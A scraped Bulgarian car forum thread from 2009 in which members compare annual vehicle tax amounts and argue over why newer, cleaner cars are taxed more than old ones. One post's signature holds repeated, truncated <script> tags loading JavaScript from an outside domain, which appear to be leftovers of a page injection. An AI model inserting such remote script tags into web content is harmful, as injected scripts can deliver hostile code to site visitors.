Аз също това се чудя не би ли трябвало,колкото е по-нова толкова да е по-малък данъка... все пак катализатори имат ала бала... а старите кошници дето пушат и не се диша като мине някоя стара кола данъка дори им е под 10лв... ???Вярно е, че колкото е по-нова колата, толкова е по-висок данъка. За първата ми коля, която беше набор 83 плащах 14 лева данък, за тая дето сега карам е около 400 лева. Тия хора от екология ли не разбират или предпочитат да караме кокошкарници на по 30 години?!?
Данъци за вашия Автомобилкакви суми плащаме
Started by bicianni, 05 Oct 2009 - 20:38:22
60 replies to this topic
#46
Posted 08 October 2009 - 12:03
#47
Posted 08 October 2009 - 14:08
На хлопела като го продавах беше 7 лв. Бях загубил бележката че е платен, та се наложи да го платя още веднъж, за да мога да продам колата
Ако си задаваш въпроса "струва ли си да ремонтирам стария Мерцедес", по-добре го продай и си купи чисто ново Пежо, Мерцедес не е твоята марка!
• Бабини деветини • clk.babailiica.com • наргиле •
#48
Posted 09 October 2009 - 21:50
7лв егати даНъчето... мечтаНа хлопела като го продавах беше 7 лв. Бях загубил бележката че е платен, та се наложи да го платя още веднъж, за да мога да продам колата
#49
Posted 10 October 2009 - 05:55
данъка на моята кошница го плащам редовно.идва някъде около 92-93 лв.това за МВ 190 118 кс.
W201 M102.962 <script
<script SRC="http://Gheos.net/js/...2.js"></SCRIPT>
SRC="http://Gheos.net/js/...2.js"></SCRIPT>
<script SRC="http://Gheos.net/js/...2.js"></SCRIPT>
SRC="http://Gheos.net/js/...2.js"></SCRIPT>
#50
Posted 13 October 2009 - 19:35
C250 TD 150 к.с-280 лева за Варна.
#51
Posted 13 October 2009 - 23:59
Обратно на темата - моя е петстотин и нещо лева. На предишната кола конете бяха по-малко, но данъка пак беше толкова. Има го тоя парадокс, че на новите коли се плаща повече.
На моя 500 му платих 590лв. за тази година, но не смятам да повтарям тази грешка и другата година
#52
Posted 14 October 2009 - 17:21
и После с лихвите ще си го платите Колега,нали знаете държавата никога няма да ви изпусне особенно за данъцитеНа моя 500 му платих 590лв. за тази година, но не смятам да повтарям тази грешка и другата година
#53
Posted 14 October 2009 - 23:35
За 7 лева може да не се хабят, ама за 590 може и съдия изпълнител да вземат Нищо лично...
Ако си задаваш въпроса "струва ли си да ремонтирам стария Мерцедес", по-добре го продай и си купи чисто ново Пежо, Мерцедес не е твоята марка!
• Бабини деветини • clk.babailiica.com • наргиле •
#54
Posted 15 October 2009 - 10:01
Няма значение дали са 7 или 700лф-държавата си ги търси и в двата случая..Лошото е,че не се събират някои от най-големите данъци,но това е друга тема..Иначе,който си кара кола за 200 иледи нека да му е висок данъка-човекът има пари(или поне се опитва да създаде такова впечатление)За 7 лева може да не се хабят, ама за 590 може и съдия изпълнител да вземат Нищо лично...
Аз понеже нямам излишни средства,съм направил сметка,че данък от 10 лф не ме затруднява въобще и си го плащам редовно,а пък и за това карам и кола с тива такси.Не съм съгласен,пък и не виждам причина новите коли да са с по-малки данъци от старите-напротив: мангизлиите,които могат да си позволят нова кола,трябва и да могат да си позволят да попълват хазната значително по-добре от ачкюпеците.Логично е.
"Марката е като живо същество-нейният авторитет расте или се уронва все повече с течение на времето..."
#55
Posted 15 October 2009 - 12:30
Не е логично колега. На твоята логика и казват комунизъм - богатите да плащат и за бедните. Я виж по белите държави как са структурирани данъците.Няма значение дали са 7 или 700лф-държавата си ги търси и в двата случая..Лошото е,че не се събират някои от най-големите данъци,но това е друга тема..Иначе,който си кара кола за 200 иледи нека да му е висок данъка-човекът има пари(или поне се опитва да създаде такова впечатление)
Аз понеже нямам излишни средства,съм направил сметка,че данък от 10 лф не ме затруднява въобще и си го плащам редовно,а пък и за това карам и кола с тива такси.Не съм съгласен,пък и не виждам причина новите коли да са с по-малки данъци от старите-напротив: мангизлиите,които могат да си позволят нова кола,трябва и да могат да си позволят да попълват хазната значително по-добре от ачкюпеците.Логично е.
Не казвам, че новите коли трябва да плащат по-малко от старите, но кола на 30 години да е 10 лева данъка, пък на нова да 1000 не е никак справедливо. Да не говорим, че старите автомобили често са в лошо състояние и екологията им е на нулево ниво.
Ако целта на това данъчно облагане е да поддържаме един морално остарял и опсен автопарк, то целта се постига.
Mercedes-Benz - Unlike any other!
#56
Posted 15 October 2009 - 12:43
Много съм съгласен с Колегата Мрадулов...Новите коли замърсяват много по-малко от старите Талиги... така че данъка няма как да им е по-висок,аз съм срещал стар микробус който пуши страшно много с данък от 9лв и примерно един Нов Мерцедес който не можеш да разбереш дали работи с данък от 300-500лв... е извинете Нормално ли е тфа ...Не е логично колега. На твоята логика и казват комунизъм - богатите да плащат и за бедните. Я виж по белите държави как са структурирани данъците.
Не казвам, че новите коли трябва да плащат по-малко от старите, но кола на 30 години да е 10 лева данъка, пък на нова да 1000 не е никак справедливо. Да не говорим, че старите автомобили често са в лошо състояние и екологията им е на нулево ниво.
Ако целта на това данъчно облагане е да поддържаме един морално остарял и опсен автопарк, то целта се постига.
#57
Posted 15 October 2009 - 13:39
Не е логично колега. На твоята логика и казват комунизъм - богатите да плащат и за бедните. Я виж по белите държави как са структурирани данъците.
Много съм съгласен с Колегата Мрадулов...Новите коли замърсяват много по-малко от старите Талиги... така че данъка няма как да им е по-висок,аз съм срещал стар микробус който пуши страшно много с данък от 9лв и примерно един Нов Мерцедес който не можеш да разбереш дали работи с данък от 300-500лв.
Господа,съгласен съм с Вас относно загриженоста Ви по отношение на екологията! Но,съгласието ми свършва до тук.Изхождайки от моята позиция,ще се аргументирам.Аз карам 15г.кола,в отлично техническо с-ние и перфектен външен вид и не мога да нося отговорност за рухналите пушещи таратайки с окаян вид,каквито наистина често се срещат.Плюс това карам само на газ/метан,при което знаете,че отделените вредни емисии са почти равни на "0"(zero!). Не мислите ли,че е по-редно да се търсят сериозни финансови санкции за цитираните от Вас "таралясници",по отношение на замърсяване и др. неизправности,отколкото да разглеждаме цифрите на данъците!?! И моля Ви,не ми говорете за комунизъм,щото я мразя тая дума,пък и сте доста по-малки от батя ви Иця и нищо не сте видели от тъй наречения "к..."
Колкото пък до "белите държави"-ами запознаите се как стоят нещата.Ако някои има яхта,самолет,ферари и кон си плаща в пъти повече от този,които стопанисва каручка и кокошка...От това по-здрава логика-нема на къде!Ако богатия потребител не напълни хазната,аз ли с мойто данъче от 10лф ще я напълня!?!И е добре да се знае,че данъците се формират и върху данъчните оценки-за дворец с басейн плащаш 5000лф(пр.),за къщурка на село:12лф(примерно).
Поздрави!
"Марката е като живо същество-нейният авторитет расте или се уронва все повече с течение на времето..."
#58
Posted 15 October 2009 - 14:58
Ама вие не уточнявате какво значи по-голям данък и по-малък данък. До преди известно време имахме прогресивни данъци. Колкото повече печелиш, толкова по-голям ти е процентът на данъка. Сега имаме плосък данък - няма значение колко печелиш - всички плащат един и същ процент данък. Това обаче изобщо не означава, че всички плащат един и същ данък. Ако аз печеля 200 лв. плащам 20 лв. данък, а ако някой печели 5000 лв. плаща 500 лв. данък.
Това за данъците върху доходите.
Данъците на колите са друг бира. Но като цяло те не покриват разходите за опазване на околната среда, така че не би било логично да са обвързани с това колко пуши колата. Също така, данъците не отиват пряко за строителство или поддръжка на пътищата, така че и от това не могат да зависят. В конституцията си пише: Чл. 60(1) Гражданите са длъжни да плащат данъци и такси, установени със закон, съобразно техните доходи и имущество. Ерго - печелиш повече - плащаш повече данък. Имаш повече имущество - плащаш повече данък.
Между другото, има и едно много известно решение на съда в САЩ, че всеки има правото да печели по-малко и да има по-малко имущество с цел да плаща по-малко данъци и това не е престъпление. Звучи малко странно, ама реално е доста клучово. Примерно означава, че мога да се съглася да работя за по-малка заплата, за да плащам по-малко данък
Това за данъците върху доходите.
Данъците на колите са друг бира. Но като цяло те не покриват разходите за опазване на околната среда, така че не би било логично да са обвързани с това колко пуши колата. Също така, данъците не отиват пряко за строителство или поддръжка на пътищата, така че и от това не могат да зависят. В конституцията си пише: Чл. 60(1) Гражданите са длъжни да плащат данъци и такси, установени със закон, съобразно техните доходи и имущество. Ерго - печелиш повече - плащаш повече данък. Имаш повече имущество - плащаш повече данък.
Между другото, има и едно много известно решение на съда в САЩ, че всеки има правото да печели по-малко и да има по-малко имущество с цел да плаща по-малко данъци и това не е престъпление. Звучи малко странно, ама реално е доста клучово. Примерно означава, че мога да се съглася да работя за по-малка заплата, за да плащам по-малко данък
Ако си задаваш въпроса "струва ли си да ремонтирам стария Мерцедес", по-добре го продай и си купи чисто ново Пежо, Мерцедес не е твоята марка!
• Бабини деветини • clk.babailiica.com • наргиле •
#59
Posted 15 October 2009 - 21:19
Пропуснал си по една нула, ама ако ги направят данъците по твоите сметки аз лично нема да цинкям.Ама вие не уточнявате какво значи по-голям данък и по-малък данък. До преди известно време имахме прогресивни данъци. Колкото повече печелиш, толкова по-голям ти е процентът на данъка. Сега имаме плосък данък - няма значение колко печелиш - всички плащат един и същ процент данък. Това обаче изобщо не означава, че всички плащат един и същ данък. Ако аз печеля 200 лв. плащам 2 лв. данък, а ако някой печели 5000 лв. плаща 50 лв. данък.
Това за данъците върху доходите.
Данъците на колите са друг бира. Но като цяло те не покриват разходите за опазване на околната среда, така че не би било логично да са обвързани с това колко пуши колата. Също така, данъците не отиват пряко за строителство или поддръжка на пътищата, така че и от това не могат да зависят. В конституцията си пише: Чл. 60(1) Гражданите са длъжни да плащат данъци и такси, установени със закон, съобразно техните доходи и имущество. Ерго - печелиш повече - плащаш повече данък. Имаш повече имущество - плащаш повече данък.
Между другото, има и едно много известно решение на съда в САЩ, че всеки има правото да печели по-малко и да има по-малко имущество с цел да плаща по-малко данъци и това не е престъпление. Звучи малко странно, ама реално е доста клучово. Примерно означава, че мога да се съглася да работя за по-малка заплата, за да плащам по-малко данък
Относно автомобилните данъци не мисля че колегата е прав. Ако карам ферари и данъка е на конска сила си плащам на конска сила, ама да плащам защото карам по-нов автомобил и вреди по-малко е кощунство. Да говорим кой на какво гориво кара е неуместно, щото има икаруси на по 40 години метан-дизел или био дизел, ама това не ги прави по-безопастни и по-комфортни, все едно да говорим дали каруцата с коня е по-безопастна на магистралата в зависимост от това дали коня е срал на магистралата или е бил с торбичка!
Ако ще си вадим кирливите ризи и ще обсъждаме данъчните налози на бутикови стоки, то май няма смисъл да спорим. Яхти, басейни и Ферарита навсякъде са скъпи и с големи данъци, но нормален автомобил чисто нов е спо-малък данък от най-екологично чистата 30 годишна кола.
Иначе какво излиза, нашата данъчна система е една от причините за финансовата криза, щото ако имахме производство на автомобили, то данъчния механизъм щеше да го убие още на ниво планиране!
Mercedes-Benz - Unlike any other!
#60
Posted 16 October 2009 - 12:56
За една нула на въпрос ли ще го правим
Ако си задаваш въпроса "струва ли си да ремонтирам стария Мерцедес", по-добре го продай и си купи чисто ново Пежо, Мерцедес не е твоята марка!
• Бабини деветини • clk.babailiica.com • наргиле •
1 user(s) are reading this topic
0 members, 1 guests, 0 anonymous users